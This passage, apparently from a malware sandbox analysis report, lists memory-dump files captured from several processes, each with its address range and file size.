                                                                                                                                                        • memory/636-192-0x0000000064941000-0x000000006494F000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          56KB

                                                                                                                                                        • memory/636-191-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.5MB

                                                                                                                                                        • memory/636-154-0x0000000000400000-0x000000000051E000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/636-190-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          572KB

                                                                                                                                                        • memory/636-189-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          152KB

                                                                                                                                                        • memory/636-147-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.5MB

                                                                                                                                                        • memory/636-188-0x0000000000400000-0x000000000051E000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/636-152-0x0000000000400000-0x000000000051E000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/1084-267-0x0000000000400000-0x0000000000893000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4.6MB

                                                                                                                                                        • memory/1084-306-0x0000000000B5C000-0x0000000000BAC000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          320KB

                                                                                                                                                        • memory/1084-308-0x0000000000400000-0x0000000000893000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4.6MB

                                                                                                                                                        • memory/1500-305-0x0000000000C70000-0x0000000001033000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          3.8MB

                                                                                                                                                        • memory/1500-293-0x0000000000C70000-0x0000000001033000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          3.8MB

                                                                                                                                                        • memory/1856-196-0x000000001C020000-0x000000001C022000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/1856-195-0x00007FFA9DF03000-0x00007FFA9DF05000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/1856-171-0x0000000000730000-0x0000000000738000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          32KB

                                                                                                                                                        • memory/2424-226-0x0000000072A0E000-0x0000000072A0F000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/2424-230-0x0000000000440000-0x000000000044C000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          48KB

                                                                                                                                                        • memory/3108-183-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          644KB

                                                                                                                                                        • memory/3108-182-0x0000000000B20000-0x0000000000BBD000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          628KB

                                                                                                                                                        • memory/3108-181-0x0000000000962000-0x00000000009C6000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          400KB

                                                                                                                                                        • memory/3452-389-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          128KB

                                                                                                                                                        • memory/3904-323-0x0000000000BB0000-0x0000000000D43000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.6MB

                                                                                                                                                        • memory/3904-349-0x0000000071330000-0x00000000713B9000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          548KB

                                                                                                                                                        • memory/3904-371-0x000000006C4D0000-0x000000006C51C000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          304KB

                                                                                                                                                        • memory/3904-357-0x0000000075D00000-0x00000000762B3000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          5.7MB

                                                                                                                                                        • memory/3904-333-0x0000000077230000-0x0000000077445000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          2.1MB

                                                                                                                                                        • memory/3904-325-0x00000000014D0000-0x00000000014D1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4084-237-0x00000000026F0000-0x0000000002750000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          384KB

                                                                                                                                                        • memory/4104-310-0x0000000010000000-0x00000000105C0000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          5.8MB

                                                                                                                                                        • memory/4116-311-0x0000000000A90000-0x0000000000A91000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4116-347-0x0000000071330000-0x00000000713B9000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          548KB

                                                                                                                                                        • memory/4116-309-0x0000000000BB0000-0x0000000000D43000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.6MB

                                                                                                                                                        • memory/4116-366-0x000000006C4D0000-0x000000006C51C000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          304KB

                                                                                                                                                        • memory/4116-328-0x0000000077230000-0x0000000077445000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          2.1MB

                                                                                                                                                        • memory/4116-355-0x0000000075D00000-0x00000000762B3000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          5.7MB

                                                                                                                                                        • memory/4512-187-0x0000017A5AB80000-0x0000017A5AB84000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          16KB

                                                                                                                                                        • memory/4512-185-0x0000017A577A0000-0x0000017A577B0000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          64KB

                                                                                                                                                        • memory/4512-186-0x0000017A57F60000-0x0000017A57F70000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          64KB

                                                                                                                                                        • memory/4776-228-0x0000000000810000-0x00000000008DE000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          824KB

                                                                                                                                                        • memory/4776-250-0x0000000005143000-0x0000000005145000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/4776-231-0x0000000005670000-0x0000000005C14000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          5.6MB

                                                                                                                                                        • memory/4776-223-0x0000000072A0E000-0x0000000072A0F000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4776-234-0x0000000005160000-0x00000000051F2000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          584KB

                                                                                                                                                        • memory/4776-240-0x0000000005150000-0x000000000515A000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          40KB

                                                                                                                                                        • memory/4776-241-0x0000000005140000-0x0000000005141000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-253-0x0000000003980000-0x0000000003981000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-261-0x0000000002CB0000-0x0000000002CB1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-252-0x0000000000C10000-0x0000000000C6F000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          380KB

                                                                                                                                                        • memory/4780-255-0x0000000002C80000-0x0000000002C81000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-259-0x0000000002C90000-0x0000000002C91000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-275-0x0000000002890000-0x0000000002891000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-274-0x0000000003990000-0x0000000003991000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-276-0x0000000002850000-0x0000000002851000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-277-0x0000000002840000-0x0000000002841000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-278-0x0000000002880000-0x0000000002881000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-279-0x0000000002860000-0x0000000002861000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-280-0x00000000028B0000-0x00000000028B1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-281-0x0000000002C00000-0x0000000002C01000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-282-0x0000000002BC0000-0x0000000002BC1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-283-0x0000000002BB0000-0x0000000002BB1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-382-0x0000000003B00000-0x0000000003B2F000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          188KB

                                                                                                                                                        • memory/4780-260-0x0000000002CA0000-0x0000000002CA1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-254-0x0000000002CC0000-0x0000000002CC1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-266-0x0000000002CD0000-0x0000000002CD1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-256-0x0000000002C70000-0x0000000002C71000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4780-262-0x0000000002CE0000-0x0000000002CE1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4812-249-0x0000000002E10000-0x0000000002E22000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          72KB

                                                                                                                                                        • memory/4812-227-0x0000000000310000-0x0000000000541000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          2.2MB

                                                                                                                                                        • memory/4812-244-0x00000000005D0000-0x00000000005D1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4812-239-0x0000000000310000-0x0000000000541000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          2.2MB

                                                                                                                                                        • memory/4812-247-0x0000000075D00000-0x00000000762B3000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          5.7MB

                                                                                                                                                        • memory/4812-265-0x000000006C4D0000-0x000000006C51C000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          304KB

                                                                                                                                                        • memory/4812-229-0x0000000000312000-0x0000000000348000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          216KB

                                                                                                                                                        • memory/4812-221-0x0000000000950000-0x0000000000996000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          280KB

                                                                                                                                                        • memory/4812-236-0x0000000077230000-0x0000000077445000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          2.1MB

                                                                                                                                                        • memory/4812-248-0x0000000005870000-0x0000000005E88000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          6.1MB

                                                                                                                                                        • memory/4812-257-0x0000000005240000-0x0000000005241000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4812-232-0x00000000005A0000-0x00000000005A1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4812-258-0x0000000002F90000-0x0000000002FCC000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          240KB

                                                                                                                                                        • memory/4812-243-0x0000000000312000-0x0000000000348000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          216KB

                                                                                                                                                        • memory/4812-251-0x0000000005250000-0x000000000535A000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.0MB

                                                                                                                                                        • memory/4812-245-0x0000000072A0E000-0x0000000072A0F000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4812-242-0x0000000071330000-0x00000000713B9000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          548KB

                                                                                                                                                        • memory/4812-238-0x0000000000310000-0x0000000000541000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          2.2MB

                                                                                                                                                        • memory/4816-268-0x0000000003580000-0x00000000035A7000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          156KB

                                                                                                                                                        • memory/4816-269-0x00000000035E0000-0x0000000003624000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          272KB

                                                                                                                                                        • memory/4816-270-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          284KB

                                                                                                                                                        • memory/4876-320-0x0000000000E90000-0x0000000000E91000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4876-263-0x0000000000920000-0x0000000000991000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          452KB

                                                                                                                                                        • memory/4876-344-0x0000000071330000-0x00000000713B9000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          548KB

                                                                                                                                                        • memory/4876-368-0x000000006C4D0000-0x000000006C51C000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          304KB

                                                                                                                                                        • memory/4876-264-0x00000000023A0000-0x0000000002436000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          600KB

                                                                                                                                                        • memory/4876-316-0x0000000000BB0000-0x0000000000D43000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.6MB

                                                                                                                                                        • memory/4876-359-0x0000000075D00000-0x00000000762B3000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          5.7MB

                                                                                                                                                        • memory/4876-331-0x0000000077230000-0x0000000077445000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          2.1MB

                                                                                                                                                        • memory/4900-330-0x0000000077230000-0x0000000077445000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          2.1MB

                                                                                                                                                        • memory/4900-364-0x000000006C4D0000-0x000000006C51C000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          304KB

                                                                                                                                                        • memory/4900-317-0x0000000002F30000-0x0000000002F31000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4900-314-0x0000000000BB0000-0x0000000000D43000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.6MB

                                                                                                                                                        • memory/4900-353-0x0000000075D00000-0x00000000762B3000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          5.7MB

                                                                                                                                                        • memory/4900-343-0x0000000071330000-0x00000000713B9000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          548KB

                                                                                                                                                        • memory/4952-271-0x0000000000A00000-0x0000000000A0D000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          52KB

                                                                                                                                                        • memory/4952-272-0x0000000000400000-0x0000000000415000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          84KB

                                                                                                                                                        • memory/4952-273-0x0000000002160000-0x0000000002173000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          76KB

                                                                                                                                                        • memory/4956-246-0x0000000002700000-0x0000000002760000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          384KB